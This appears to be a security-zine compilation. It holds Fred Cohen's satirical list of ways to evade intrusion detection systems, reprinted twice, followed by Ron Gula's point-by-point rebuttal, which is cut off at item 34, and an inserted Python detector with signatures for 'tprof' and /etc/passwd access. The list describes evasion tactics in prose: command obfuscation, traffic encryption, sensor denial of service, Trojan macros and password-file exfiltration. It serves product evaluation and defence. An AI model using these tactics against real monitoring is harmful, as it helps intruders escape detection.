16 - Use a postfix notation for transmissions, and then translate back at
the other end. The detector will not be able to understand the syntax.

17 - Turn on full duplex communications mode with the target. The extra
characters going back and forth may confuse the IDS.

18 - Intermix several known intrusion techniques by alternating one
instruction from each. The IDS is likely not to recognize any of the
attacks.

19 - Encode results sent by daemons so that the patterns of what is
returned cannot be used for detection. For example, instead of mailing
yourself a password file by exploiting a sendmail bug, pipe the password
file through a sed script that changes the ‘:’s to ‘-’s.

20 - Attack by piping everything through an awk script that exchanges
characters. This will confuse the IDS.

Bonus attack - Run commands selected from a table by the row number and
have the victim system do the command-line calls. So you might send
’15 *.com’ and the victim system might do ‘dir *.com’.

21 - Overwhelm the IDS sensor ports. For example, by using an echo virus
against a UDP port, you might make the sensor port unable to receive
further sensor inputs.

22 - Crash the IDS with ping packets. By sending long IPNG packets, many
systems that run IDS systems can be crashed, causing them to fail to
detect subsequent attacks.

23 - Kill the IDS by attacking its platform. Most IDS systems run on
regular hosts which can themselves be attacked. Once the platform is
taken over, the IDS can be subverted.

24 - Create false audit records to confuse the IDS. For example, send
packets to the IDS in between the packets that might indicate an attack
and containing information that makes the attack actions look harmless.

25 - Consume all IDS disk space then launch for real. By (for example)
overrunning the disk space consumed by the IDS with innocuous but
detected sequences, the IDS will fail and subsequent attacks go
undetected.

26 - Stop the generation or collection of audit records then attack. For
example, by creating a large number of processes, the system running the
IDS may not be able to create the process needed to generate an audit
record.

27 - Cause the response system to disrupt normal communications. For
example, some IDS systems respond to repeated attacks from a site by
cutting off all traffic from that site. By forging malicious traffic
coming from a particular host, the IDS may cut off all traffic from that
host, after which it can be attacked at will.

28 - Type everything in backwards and use a translator program to reverse
it. Do the same in transmissions sent back to you.

29 - Type everything in infix notation and have it translated via ‘awk’
into prefix notation. The IDS may be unable to interpret the traffic.

30 - Use ‘emacs’ as the shell and use wipes and yanks in and out of the
‘cmd’ buffer instead of typing. The IDS will see things like control-W
and control-Y while the command interpreter on the victim site will see
malicious commands.

Bonus attack - Type very slowly (over a period of hours per command line
should do nicely). Since buffer sizes are limited, your traffic may be
lost in the glut of other things the IDS has to watch.

31 - Change routes to target to avoid the IDS.

32 - Change return routes from target to avoid the IDS.

33 - Use source routing to reroute each packet through a different path
to the victim, thus avoiding any single IDS.

34 - Start an outbound session from the victim via a modem and attack
over that connection. If the IDS is network-based, it will miss these
packets.

35 - Interfere with the infrastructure between the victim and the IDS. In
remote monitoring and network-based IDS systems, this is often possible
by modifying router traffic (as a simple example).

36 - Break into an intermediary to break the traceback of the attack. The
intrusion may be detected, but they won’t be able to trace it to you
(unless they are very good at traces).

37 - Start a session on an unusual IP port. These ports are often not
understood or watched by IDS systems.

38 - Use a modified protocol for communications, such as one that
reverses bytes on words. (See PDP-11 and VAX encodings for examples).

39 - Use IPX over IP for the attack. The IDS will probably only notice
the IP packets and not understand the content.

40 - Use a different tunneled protocol session for the attack - such as
IP over HTML.

Bonus Attack - Define your own protocol for a new application and attack
over it.

41 - Attack over dial-ins instead of a network. Network-based IDS systems
will never notice this activity.

42 - Create large numbers of false positives to increase noise level.
This will make finding the real attack human time intensive and people
tend to fail under these circumstances.

43 - Plant the intrusion instructions within a Word macro and send a
document to the victim. The IDS probably can’t decode the attack inside
the macro.

44 - Plant the intrusion code within another macro and send to victim.
Power point perhaps, or 123, or … you get the idea.

45 - Put the attack in a compiled program (i.e., a Trojan Horse) and get
the victim to download the attack and run it for you.

46 - Use a rarely used protocol for the attack. Chances are the IDS
doesn’t know how to interpret the packets.

47 - Recode the attack in a different language than it was originally
published in.

48 - Use any non-technical attack (such as so-called human engineering).
Since the IDS only looks at bits and bytes, it doesn’t detect many of the
common attacks used by attackers today.

49 - Attack any system that doesn't run Unix. Since almost all of today’s
IDS systems only look for Unix attacks, everything else will pass
undetected. (Some apparently detect NT attacks now as well.)

50-1000+ - Use one of the 1000 or so published attacks not detected by
current systems. The largest number of detected attacks I have seen
advertised to date as being detected by any such system is only about 50.
(One vendor recently claimed over 150, but the newest numbers I heard for
known vulnerabilities has gone up to 2,000) Nevertheless, 150 is progress
over 50!

Bonus attacks - 1000+ to infinity - Create a new attack script. IDS
systems today almost all look only for a small number of known attacks.

Afterword:

This ends the original article sent to the Computer Security Institute,
but it doesn’t even start to end the story of what happened later. It
ended up that the URL for this article was sent to a mailing list for
principal investigators funded in the intrusion detection research area.
It seems that some of them have not yet mastered the art of laughing at
themselves and were more than a bit upset at my statements. Others were
quite whimsical, and still others took a serious tone but were not
offended by the content.

What was strange to me was that I led a serious study of intrusion
detection systems less than a year earlier and had the results reviewed
by these same folks. Almost none of them had more than a passing comment
on the technical paper that indicated all of the weaknesses described in
this article and a large class of other ones. While I rarely do such a
thing, I will quote here from a private email I sent to one of these
folks:

    Pretty strange to watch all this commentary in the research community
    over a paper intended as a humorous poke at vendors trying to sell
    poor quality solutions to unsuspecting computer security managers at
    companies. The serious paper is the national infosec technical
    baseline, but it apparently engendered no such discussion.
When will I learn that people ignore my serious work and pay lots of attention to my play pieces. Summary and Conclusions: I have a policy of always delivering a little bit more than I promise. While at least one early reader of this article declared that I could not count, they also asserted that there were only 40 ways listed in the article. When I read the comment I immediately went back and recounted, and I am pretty sure I have exceeded my goal of 50 ways. If you laughed at some of these attacks, I am glad, because many of the current intrusion detection systems are, in my opinion, laughable. If you are offended by my disregard for the products available today, you are probably a vendor in this field wishing I hadn’t told all those decision makers how to ask the tough questions about your product. The major conclusion that I draw from the 50 ways is that intrusion detection is still in its infancy. In many cases, products are simply not ready for prime time, and in other cases, the efforts required to make them viable in your business are not justified by the acquisition, configuration, or operation costs. I hope you have enjoyed this holiday article and that you will enjoy and prosper throughout the coming year. Happy holidays. About The Author: Fred Cohen is a Principal Member of Technical Staff at Sandia National Laboratories and a Senior Partner of Fred Cohen and Associates in Livermore California, an executive consulting and education group specializing in information protection. He can be reached by sending email to fc@all.net. Managing Network Security 50 Ways to Defeat Your Intrusion Detection System by Fred Cohen of Fred Cohen & Associates (fc@all.net) http://all.net/ Series Introduction Over the last several years, computing has changed to an almost purely networked environment, but the technical aspects of information protection have not kept up. 
As a result, the success of information security programs has increasingly become a function of our ability to make prudent management decisions about organizational activities. Managing Network Security takes a management view of protection and seeks to reconcile the need for security with the limitations of technology.

Background and Introduction:

This article is based on a short piece I wrote a few weeks ago on an airplane on the way back from the National Computer Security Center / National Institute of Science and Technology conference. I was one of 12 speakers on a panel discussion about how to protect networks when the style of computing involves loading untrusted executable programs from over the Internet into network browsers running on computers inside the firewall. At some point during that panel discussion I stated that, while the idea of intrusion detection systems was an interesting one and one that should be followed as a possible candidate for helping to address this challenge, current systems were so poor as to be not worth the effort to implement them. (My actual words were a bit less polite, but you get the idea.)

After the panel, I had to go to the airport straight away to make my plane. When I sat down, I was surprised to find both the editor (Richard Power) and director (Patrice Rapalus) of the Computer Security Institute sitting in the next row taking the same set of flights back to San Francisco. As we discussed the conference and I mentioned the limited abilities of intrusion detection systems, Richard joked that I could write an article on the 50 ways to bypass intrusion detection systems. I had written the 50 Ways to Attack Your World Wide Web Systems a few years earlier just before their fall conference. I know Richard was surprised when I asked him when he needed it. The deadline was in a few days and, since the plane ride was several hours long and I had my pocket computer in my pocket, I told him I'd have it for him before the first stop (Dallas - Fort Worth). I started typing and, every few attacks, read them a sample; they laughed at the funnier ones, and it made the plane ride a bit more pleasant for an hour or so. When I finished the 50 ways (plus a few bonus ways) I read the whole piece to them, they laughed at the funnier parts, and Richard had it in his email before he got home.

Here then is the piece, more or less as it was when I emailed it to them, complete with the original introduction. It was my hope then as it is my hope now that you will both enjoy the humor in these weaknesses and appreciate the seriousness underlying them at the same time.

Original Introduction:

In my ongoing attempt to cover the legal bills associated with trying to get Netscape to pay the $50,000 they should owe me for demonstrating 50 ways to attack World Wide Web systems a few years back, I have been forced to write articles such as this one for trade rags such as this one. In keeping with this most serious of tones, I introduce here, 50 ways to defeat modern (i.e., stone aged) intrusion detection systems.

Background:

From a standpoint of the network security manager, it is often difficult to tell the wheat from the chaff when selecting products or deciding on capabilities. The current situation in intrusion detection is that very few managers know how to make a proper decision and vendors seem to be taking advantage of this knowledge vacuum to make sales. I have heard many claims and a wide range of prices for these systems, but the plain truth is that most current intrusion detection technologies and systems available to the average buyer are poor at best. This seems to me to be a case where the emperor has no clothes. Since exposing naked emperors is one of my goals in life, I thought it might be useful to provide decision-makers with some ammunition to use in evaluating candidate systems. While I hope my playful tone is understood, the issues underlying these examples are serious and these examples are only the tip of the iceberg.

The 50 Ways:

1 - Inserting extraneous characters into a standard attack typically causes detection failure. As an example, you could insert the string ‘&& true’ into a typical shell command line without ill effect on operation but with degraded IDS performance.

2 - Use tabs instead of spaces in commands. Since most current systems don’t interpret all separators in the same way, changing to non-standard separators can make them fail. You might also try ‘,’ instead of ‘;’ in the Unix shell.

3 - Closely related to number 2, you could change the separator character in the system so that (for example) % is the separator. This would confuse detection systems almost without exception.

4 - Reorder a detected attack sequence. For example, if the attack goes ‘a;b;c’ and it would also work as ‘b;a;c’, most detection systems would rank the one they were not tuned to find as unlikely to be an actual attack.

5 - Split a standard attack across more than one user. Using the ‘a;b;c’ example above, if user X types ‘a;b’ and user Y types ‘c’ the attack is almost certain to go undetected.

6 - Split a standard attack across multiple sessions. Login once and type ‘a;b’, logout, then login and type ‘c’.

7 - Split across multiple remote IP addresses/systems. Login from sites X and Y, and type ‘a’ from site X, ‘b’ from site Y, and ‘c’ from site X.

8 - Define a macro for a command used in a standard attack. For example, set a shell variable called ‘$ZZ’ to ‘cp’ and then use ‘$ZZ’ instead of ‘cp’ where appropriate.

9 - Define a macro for a parameter in a standard attack. For example, use the name ‘$P’ instead of the string ‘/etc/passwd’.
10 - Create shell scripts to replace commands you use. If you do this carefully, the detector will not associate the names you use for the scripts to the commands and will miss the whole attack.

Bonus attack - Add comments to attack lines in an attack that would otherwise be detected.

11 - Use different commands to do the same function. For example, ‘echo *’ is almost the same as ‘ls’ in the Unix shell.

12 - Change the names in standard attacks. For example, if the standard attack uses a temporary file named ‘xxx’, try using ‘yyy’.

13 - Create a code-book translator for attack keywords. This can be done by piping all commands through a filter program – perhaps using ‘sed’ to do string substitution.

14 - Encode the attacks in ‘ebcdic’ and change terminal types to an ‘ebcdic’ terminal. Since all the characters are differently coded, the detector will be unable to decode your actions.

15 - Encrypt your attacks – for example, by using the secure shell facilities intended to increase protection by preventing snooping – including snooping by the IDS.

16 - Use a postfix notation for transmissions, and then translate back at the other end. The detector will not be able to understand the syntax.

17 - Turn on full duplex communications mode with the target. The extra characters going back and forth may confuse the IDS.

18 - Intermix several known intrusion techniques by alternating one instruction from each. The IDS is likely not to recognize any of the attacks.

19 - Encode results sent by daemons so that the patterns of what is returned cannot be used for detection. For example, instead of mailing yourself a password file by exploiting a sendmail bug, pipe the password file through a sed script that changes the ‘:’s to ‘-‘s.

20 - Attack by piping everything through an awk script that exchanges characters. This will confuse the IDS.

Bonus attack - Run commands selected from a table by the row number and have the victim system do the command-line calls. So you might send ’15 *.com’ and the victim system might do ‘dir *.com’.

21 - Overwhelm the IDS sensor ports. For example, by using an echo virus against a UDP port, you might make the sensor port unable to receive further sensor inputs.

22 - Crash the IDS with ping packets. By sending long IPNG packets, many systems that run IDS systems can be crashed, causing them to fail to detect subsequent attacks.

23 - Kill the IDS by attacking its platform. Most IDS systems run on regular hosts which can themselves be attacked. Once the platform is taken over, the IDS can be subverted.

24 - Create false audit records to confuse the IDS. For example, send packets to the IDS in between the packets that might indicate an attack and containing information that makes the attack actions look harmless.

25 - Consume all IDS disk space then launch for real. By (for example) overrunning the disk space consumed by the IDS with innocuous but detected sequences, the IDS will fail and subsequent attacks go undetected.

26 - Stop the generation or collection of audit records then attack. For example, by creating a large number of processes, the system running the IDS may not be able to create the process needed to generate an audit record.

27 - Cause the response system to disrupt normal communications. For example, some IDS systems respond to repeated attacks from a site by cutting off all traffic from that site. By forging malicious traffic coming from a particular host, the IDS may cut off all traffic from that host, after which it can be attacked at will.

28 - Type everything in backwards and use a translator program to reverse it. Do the same in transmissions sent back to you.

29 - Type everything in infix notation and have it translated via ‘awk’ into prefix notation. The IDS may be unable to interpret the traffic.

30 - Use ‘emacs’ as the shell and use wipes and yanks in and out of the ‘cmd’ buffer instead of typing. The IDS will see things like control-W and control-Y while the command interpreter on the victim site will see malicious commands.

Bonus attack - Type very slowly (over a period of hours per command line should do nicely). Since buffer sizes are limited, your traffic may be lost in the glut of other things the IDS has to watch.

31 - Change routes to target to avoid the IDS.

32 - Change return routes from target to avoid the IDS.

33 - Use source routing to reroute each packet through a different path to the victim, thus avoiding any single IDS.

34 - Start an outbound session from the victim via a modem and attack over that connection. If the IDS is network-based, it will miss these packets.

35 - Interfere with the infrastructure between the victim and the IDS. In remote monitoring and network-based IDS systems, this is often possible by modifying router traffic (as a simple example).

36 - Break into an intermediary to break the traceback of the attack. The intrusion may be detected, but they won’t be able to trace it to you (unless they are very good at traces).

37 - Start a session on an unusual IP port. These ports are often not understood or watched by IDS systems.

38 - Use a modified protocol for communications, such as one that reverses bytes on words. (See PDP-11 and VAX encodings for examples.)

39 - Use IPX over IP for the attack. The IDS will probably only notice the IP packets and not understand the content.

40 - Use a different tunneled protocol session for the attack – such as IP over HTML.

Bonus Attack - Define your own protocol for a new application and attack over it.

41 - Attack over dial-ins instead of a network. Network-based IDS systems will never notice this activity.

42 - Create large numbers of false positives to increase noise level. This will make finding the real attack human time intensive and people tend to fail under these circumstances.

43 - Plant the intrusion instructions within a Word macro and send a document to the victim.
The IDS probably can’t decode the attack inside the macro.

44 - Plant the intrusion code within another macro and send to victim. Power point perhaps, or 123, or … you get the idea.

45 - Put the attack in a compiled program (i.e., a Trojan Horse) and get the victim to download the attack and run it for you.

46 - Use a rarely used protocol for the attack. Chances are the IDS doesn’t know how to interpret the packets.

47 - Recode the attack in a different language than it was originally published in.

48 - Use any non-technical attack (such as so-called human engineering). Since the IDS only looks at bits and bytes, it doesn’t detect many of the common attacks used by attackers today.

49 - Attack any system that doesn't run Unix. Since almost all of today’s IDS systems only look for Unix attacks, everything else will pass undetected. (Some apparently detect NT attacks now as well.)

50-1000+ - Use one of the 1000 or so published attacks not detected by current systems. The largest number of detected attacks I have seen advertised to date as being detected by any such system is only about 50. (One vendor recently claimed over 150, but the newest numbers I heard for known vulnerabilities has gone up to 2,000.) Nevertheless, 150 is progress over 50!

Bonus attacks - 1000+ to infinity - Create a new attack script. IDS systems today almost all look only for a small number of known attacks.

Afterward:

This ends the original article sent to the Computer Security Institute, but it doesn’t even start to end the story of what happened later. It ended up that the URL for this article was sent to a mailing list for principal investigators funded in the intrusion detection research area. It seems that some of them have not yet mastered the art of laughing at themselves and were more than a bit upset at my statements. Others were quite whimsical, and still others took a serious tone but were not offended by the content.

What was strange to me was that I led a serious study of intrusion detection systems less than a year earlier and had the results reviewed by these same folks. Almost none of them had more than a passing comment on the technical paper that indicated all of the weaknesses described in this article and a large class of other ones. While I rarely do such a thing, I will quote here from a private email I sent to one of these folks:

Pretty strange to watch all this commentary in the research community over a paper intended as a humorous poke at vendors trying to sell poor quality solutions to unsuspecting computer security managers at companies. The serious paper is the national infosec technical baseline, but it apparently engendered no such discussion. When will I learn that people ignore my serious work and pay lots of attention to my play pieces.

Summary and Conclusions:

I have a policy of always delivering a little bit more than I promise. While at least one early reader of this article declared that I could not count, they also asserted that there were only 40 ways listed in the article. When I read the comment I immediately went back and recounted, and I am pretty sure I have exceeded my goal of 50 ways. If you laughed at some of these attacks, I am glad, because many of the current intrusion detection systems are, in my opinion, laughable. If you are offended by my disregard for the products available today, you are probably a vendor in this field wishing I hadn’t told all those decision makers how to ask the tough questions about your product.

The major conclusion that I draw from the 50 ways is that intrusion detection is still in its infancy. In many cases, products are simply not ready for prime time, and in other cases, the efforts required to make them viable in your business are not justified by the acquisition, configuration, or operation costs. I hope you have enjoyed this holiday article and that you will enjoy and prosper throughout the coming year. Happy holidays.

About The Author:

Fred Cohen is a Principal Member of Technical Staff at Sandia National Laboratories and a Senior Partner of Fred Cohen and Associates in Livermore California, an executive consulting and education group specializing in information protection. He can be reached by sending email to fc@all.net.

@HWA

105.0 50 reasons IDS systems work by Ron Gula
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"50 Reasons IDS Systems Work"

Comment and review of the article, "50 Ways to Defeat Your Intrusion Detection System" authored by Fred Cohen.

By Ron Gula
June 1999

Several of our customers have pointed out an excellent article about weaknesses in intrusion detection by Fred Cohen entitled "50 Ways to Defeat Your Intrusion Detection System". All fifty ways are included in this paper, but the original version can be downloaded from http://all.net if so desired. In the paper, Mr. Cohen states "... while the idea of intrusion detection systems was an interesting one and one that should be followed as a possible candidate for helping to address this challenge, current systems were so poor as to be not worth the effort to implement them." Mr. Cohen was claiming that intrusion detection was of little use in helping increase or manage network security. The paper then lists 55 techniques that an attacker can use to bypass intrusion detection systems.

This article comments on each of the 55 techniques. Many of these techniques are either irrelevant or simply don't work. Almost all of the attacks are techniques that can be deployed with pre-existing system access. A significant percentage of them are techniques one can use to abuse a pre-established Telnet session. Our intent is to educate readers by providing a different perspective of network and computer intrusion detection systems.

The 50 Ways:

1 - Inserting extraneous characters into a standard attack typically causes detection failure.
As an example, you could insert the string '&& true' into a typical shell command line without ill effect on operation but with degraded IDS performance.

In general, this is only true if the attack medium can accept extra benign characters. For example, the PHF web attack uses a string of '/cgi-bin/phf'. There aren't any characters that can be prefixed or appended that will cause a web server to still accept the URL. In the above example, if one were to exploit the older AIX 'tprof' get-root, the 'tprof' program would need to be invoked at some point. Any IDS that matched on that word would have a positive match. Very few IDS systems look for complex attacks. They look for the smaller pieces of the attack.

2 - Use tabs instead of spaces in commands. Since most current systems don't interpret all separators in the same way, changing to non-standard separators can make them fail. You might also try ',' instead of ';' in the Unix shell.

Same as number one. Using several tabs to run the 'tprof' program still requires 'tprof' to appear in a command line. And that can cause a host or network based IDS to detect the attack.

3 - Closely related to number 2, you could change the separator character in the system so that (for example) % is the separator. This would confuse detection systems almost without exception.

This requires modification of the IFS (internal field separator) environment variable. Many host based IDS products alert on modification of this field. Most network based IDS products don't concentrate on this sort of attack. However, the attacks described in 1, 2 and 3 would not affect host-based IDS products such as Tripwire, Stalker and CMDS.

4 - Reorder a detected attack sequence. For example, if the attack goes 'a;b;c' and it would also work as 'b;a;c', most detection systems would rank the one they were not tuned to find as unlikely to be an actual attack.

Logically this is an appealing argument; however, modern vulnerabilities are usually exploited in one step. These vulnerabilities can be identified by many different IDS products. More complex attacks are also likely to have a few of their individual steps detected by an IDS.

5 - Split a standard attack across more than one user. Using the 'a;b;c' example above, if user X types 'a;b' and user Y types 'c' the attack is almost certain to go undetected.

Again, if steps 'a', 'b' or 'c' are required to do an attack, then it is likely that an IDS will pick up on at least one of them, regardless of which user executes it. Using multiple accounts does confuse security operators, but exploits still tend to be detected.

6 - Split a standard attack across multiple sessions. Login once and type 'a;b', logout, then login and type 'c'.

Same as #5. Get-root exploit scripts can be multiple lines long, but the bottom line is that they really only do the exploiting on one line. For example, there has to be a command that causes a user to go from a non-privileged user to a super user.

7 - Split across multiple remote IP addresses/systems. Login from sites X and Y, and type 'a' from site X, 'b' from site Y, and 'c' from site X.

Again, same as #5 and #6. The extra traffic may also raise the interest of a network based IDS. And IDS products such as CMDS will notice multiple remote accesses from different locations in a small amount of time.

8 - Define a macro for a command used in a standard attack. For example, set a shell variable called '$ZZ' to 'cp' and then use '$ZZ' instead of 'cp' where appropriate.

Adds complexity, but an IDS should be able to detect the access. Imagine an IDS that triggers on the 'tprof' program. It will log an event when it is used in a macro assignment. The same is true for methods that redefine a shell variable for the /etc/passwd file. Any IDS that triggers on access to the /etc/passwd file in a Telnet session would alert on that event.
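As an added illustration, not from either article, here is a small Python canonicalizer that runs constructed signatures over a constructed Telnet-session transcript and shows Gula's point for techniques 1, 2, 3, 8 and 9: once separators, '&& true' filler and session-level aliases are resolved, the 'tprof' and /etc/passwd tokens are still there to match, and the IFS change is itself an alertable event. The signature names, the session-state handling and the sample lines are all assumptions of this example.

```python
"""Canonicalizing matcher for shell session lines (constructed example).

Shows why techniques 1, 2, 3, 8 and 9 leave the keyword a signature keys
on ('tprof', '/etc/passwd') visible once the line is canonicalized, and why
an IFS reassignment is itself an alertable event.  Signatures, session
state handling and sample lines are all constructed for this illustration.
"""
import re

# Constructed signatures for the "smaller pieces" of an attack.
SIGNATURES = {
    "tprof-invocation": re.compile(r"(?:^|[;|&( ])tprof(?:[ ;|&)]|$)"),
    "passwd-access": re.compile(r"/etc/passwd"),
}

ASSIGN_RE = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*)=(.*)$")
VAR_RE = re.compile(r"\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?")
# '&& true', '|| true' or '; true' appended as filler (technique 1).
NOOP_RE = re.compile(r"(?:&&|\|\||;)\s*true(?=\s*(?:[;&|]|$))")
STMT_SPLIT_RE = re.compile(r"\s*(?:;|&&|\|\|)\s*")


def new_session_state():
    """Per-session memory: observed variable assignments and IFS changes."""
    return {"vars": {}, "ifs": ""}


def normalize(line, state):
    """Canonicalize one line; returns (canonical_line, alerts).

    Updates `state` with any assignments seen so later lines can be
    expanded the same way the victim's shell would expand them.
    """
    alerts = []
    # Techniques 2/3: tabs, spaces and any separator the session set via
    # IFS collapse to a single space.  (A real shell applies IFS only to
    # the results of expansions, so this deliberately over-approximates.)
    sep_class = "[" + re.escape(" \t" + state["ifs"]) + "]+"
    canon = re.sub(sep_class, " ", line.strip())
    # Technique 1: strip filler conjuncts that do not change behaviour.
    canon = NOOP_RE.sub("", canon).strip()
    # Techniques 8/9: substitute $ZZ / ${P} with the value this session assigned.
    canon = VAR_RE.sub(lambda m: state["vars"].get(m.group(1), m.group(0)), canon)
    # Remember assignments for later lines; an IFS change is an alert on its own.
    for stmt in STMT_SPLIT_RE.split(canon):
        m = ASSIGN_RE.match(stmt.strip())
        if not m:
            continue
        name, value = m.group(1), m.group(2).strip("'\"")
        if name == "IFS":
            alerts.append("ifs-modified")
            state["ifs"] = value
        else:
            state["vars"][name] = value
    return canon, alerts


def scan_session(lines):
    """Run a whole session through the normalizer and the signature set.

    Returns a list of (line_number, canonical_line, sorted_alert_names).
    """
    state = new_session_state()
    hits = []
    for number, raw in enumerate(lines, 1):
        canon, alerts = normalize(raw, state)
        alerts.extend(name for name, rx in SIGNATURES.items() if rx.search(canon))
        if alerts:
            hits.append((number, canon, sorted(set(alerts))))
    return hits


# Constructed Telnet-session transcript exercising the techniques.
SAMPLE_SESSION = [
    "ls\t-l && true",             # techniques 1 and 2 on a benign command
    "ZZ=cp",                      # technique 8: alias the command
    "P=/etc/passwd",              # technique 9: alias the parameter (alerts)
    "$ZZ\t$P\t/tmp/p && true",    # 1, 2, 8 and 9 combined
    "IFS='%'",                    # technique 3: change the separator (alerts)
    "tprof%-x%/tmp/p",            # 'tprof' still has to appear (Gula, #1 and #2)
]

if __name__ == "__main__":
    for number, canon, alerts in scan_session(SAMPLE_SESSION):
        print(f"line {number}: {alerts} <- {canon!r}")
```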
And again, these techniques do little to stop detection in the face of host based IDS systems such as CMDS, Stalker and Tripwire.

9 - Define a macro for a parameter in a standard attack. For example, use the name '$P' instead of the string '/etc/passwd'.

See #8.

10 - Create shell scripts to replace commands you use. If you do this carefully, the detector will not associate the names you use for the scripts to the commands and will miss the whole attack.

This is the first real technique that is actually possible. Unfortunately, it does not address what happens after the attack has succeeded. Tools such as CMDS will detect login sessions that are out of character. Tripwire will detect any backdoors. Renaming tools such as 'nmap' and 'strobe' is a good idea, but as soon as they are used, a network based IDS will pick them up.

------------------------------------------------------------------------
Bonus attack - Add comments to attack lines in an attack that would otherwise be detected.
------------------------------------------------------------------------

If the attack is referring to a get-root exploit script, then most IDS products are robust enough to detect variations in the attack. This was discussed in 4, 5, 6 and 7.

11 - Use different commands to do the same function. For example, 'echo *' is almost the same as 'ls' in the Unix shell.

One would still need to run 'tprof' if one were to exploit it. Even if one were to compile a binary program on a different system rather than simply run the 'tprof' program, many different IDS systems such as Stalker and SeOS would see the unauthorized transition from an unprivileged user to a root user.

12 - Change the names in standard attacks. For example, if the standard attack uses a temporary file named 'xxx', try using 'yyy'.

This assumes that an IDS is searching for too specific an exploit. See 11.

13 - Create a code-book translator for attack keywords. This can be done by piping all commands through a filter program - perhaps using 'sed' to do string substitution.

See 11.

14 - Encode the attacks in 'ebcdic' and change terminal types to an 'ebcdic' terminal. Since all the characters are differently coded, the detector will be unable to decode your actions.

See 11.

15 - Encrypt your attacks - for example, by using the secure shell facilities intended to increase protection by preventing snooping - including snooping by the IDS.

This is only true for network based IDS systems. Host based systems have full access to a user's actions under Secure Shell.

16 - Use a postfix notation for transmissions, and then translate back at the other end. The detector will not be able to understand the syntax.

See 15.

17 - Turn on full duplex communications mode with the target. The extra characters going back and forth may confuse the IDS.

Dragon, T-Sight and all versions of the DoD NID program are not vulnerable to this.

18 - Intermix several known intrusion techniques by alternating one instruction from each. The IDS is likely not to recognize any of the attacks.

Or it is more likely to recognize at least one of the attacks. This is very similar to 5, 6 and 7 and is not a new technique.

19 - Encode results sent by daemons so that the patterns of what is returned cannot be used for detection. For example, instead of mailing yourself a password file by exploiting a sendmail bug, pipe the password file through a sed script that changes the ':'s to '-'s.

The bug still needs to be exploited. What happens to the password file after the exploit is interesting, but not directly part of the exploit.

20 - Attack by piping everything through an awk script that exchanges characters. This will confuse the IDS.

Same as 15. This is not a new attack.

------------------------------------------------------------------------
Bonus attack - Run commands selected from a table by the row number and have the victim system do the command-line calls. So you might send '15 *.com' and the victim system might do 'dir *.com'.
------------------------------------------------------------------------

Same as 15. This is just a new way of encrypting shell commands.

21 - Overwhelm the IDS sensor ports. For example, by using an echo virus against a UDP port, you might make the sensor port unable to receive further sensor inputs.

Most network based IDS products are deployed securely and many have the ability to implement sensor interfaces without IP stacks. Some of the IDS products, such as Dragon, don't even have any open UDP or TCP ports. RealSecure, NetProwler, and NetRanger also could unbind the IP stack to prevent compromise.

22 - Crash the IDS with ping packets. By sending long PING packets, many systems that run IDS systems can be crashed, causing them to fail to detect subsequent attacks.

A second denial of service technique is not a new way to defeat an IDS. Elaborating on 21, most network IDS platforms are stripped down and deployed in a higher state of security than the surrounding network environment. Although I'm sure there are many network IDS systems running on Windows NT servers that have been deployed out of the box and are vulnerable to many DoS and other attacks.

23 - Kill the IDS by attacking its platform. Most IDS systems run on regular hosts which can themselves be attacked. Once the platform is taken over, the IDS can be subverted.

How is this different than 22 and 21?

24 - Create false audit records to confuse the IDS. For example, send packets to the IDS in between the packets that might indicate an attack and containing information that makes the attack actions look harmless.

SNI wrote an excellent paper on this topic. NFR and Dragon network based IDS systems are not vulnerable to these attacks. And in general, host based IDS products have never been vulnerable to these attacks.

25 - Consume all IDS disk space then launch for real.
By (for example) overrunning the disk space consumed by the IDS with innocuous but detected sequences, the IDS will fail and subsequent attacks go undetected.

How can one tell when a passive network IDS has crashed? If the IDS is logging all this data, it will also probably be noticed by someone if they have a clue. The last thing that an attacker wants to do is raise the awareness of network defenders.

26 - Stop the generation or collection of audit records then attack. For example, by creating a large number of processes, the system running the IDS may not be able to create the process needed to generate an audit record.

This is a localized denial of service attack. Many UNIX operating systems are resistant to these local attacks. Host based IDS products that use single processes are also immune. More likely, if this is a heavily used server, the high number of processes will be noticed by an administrator.

27 - Cause the response system to disrupt normal communications. For example, some IDS systems respond to repeated attacks from a site by cutting off all traffic from that site. By forging malicious traffic coming from a particular host, the IDS may cut off all traffic from that host, after which it can be attacked at will.

This is my favorite attack described in Mr. Cohen's article. If I understand this correctly, this example tries to use the IDS's automatic blocking of IP addresses against the defended network. Some IDS products such as CMDS, NetRanger, NetProwler and RealSecure can "speak" with firewalls and routers. When certain events occur, the routers and firewalls can be asked to restrict traffic from a particular host. There are some traffic flow problems with this technique, namely firewalls and IDS systems typically work on the perimeter of a defended network. When traffic is restricted, it is inbound traffic. The target host will not be isolated for attack.

28 - Type everything in backwards and use a translator program to reverse it. Do the same in transmissions sent back to you.

Same as 15. This is just a new way to disguise shell commands.

29 - Type everything in infix notation and have it translated via 'awk' into prefix notation. The IDS may be unable to interpret the traffic.

Same as 15. Both 28 and 29 only apply when a network based IDS is watching a Telnet or Rlogin session. These techniques cannot be easily replicated on FTP, HTTP, SMTP and many other protocols.

30 - Use 'emacs' as the shell and use wipes and yanks in and out of the 'cmd' buffer instead of typing. The IDS will see things like control-W and control-Y while the command interpreter on the victim site will see malicious commands.

NFR and RealSecure detect the use of 'emacs' because anyone who doesn't use 'vi' is obviously a hacker. No seriously, this attack is just another way to hide "in plain sight" over a Telnet or Rlogin session.

------------------------------------------------------------------------
Bonus attack - Type very slowly (over a period of hours per command line should do nicely). Since buffer sizes are limited, your traffic may be lost in the glut of other things the IDS has to watch.
------------------------------------------------------------------------

A network based IDS is vulnerable to this. However, host based systems aren't. Some network based IDS systems such as NFR and Dragon can even be configured to detect long term low bandwidth network sessions.

31 - Change routes to target to avoid the IDS.

This is a valid attack if knowledge of the topology is known beforehand. Many times in order to accomplish this, a certain amount of network discovery is required. This mapping can be easily picked up by most network based IDS products. It also requires perfect knowledge of where passive IDS systems are deployed.

32 - Change return routes from target to avoid the IDS.

See 31.

33 - Use source routing to reroute each packet through a different path to the victim, thus avoiding any single IDS.

Almost every firewall, router and server drops and logs source routed packets. 31, 32 and 33 also assume that there are alternate network paths to target servers when in fact most network IDS systems are deployed as choke points.

34 - Start an outbound session from the victim via a modem and attack over that connection. If the IDS is network-based, it will miss these packets.

Absolutely. We can add even more methods to defeat intrusion detection systems by identifying them and then launching attacks that they do not detect. For example, we may be able to deliver a virus to a Windows NT system protected by Axent IA, BlackICE or even RealSecure. None of those systems detect system level viruses.

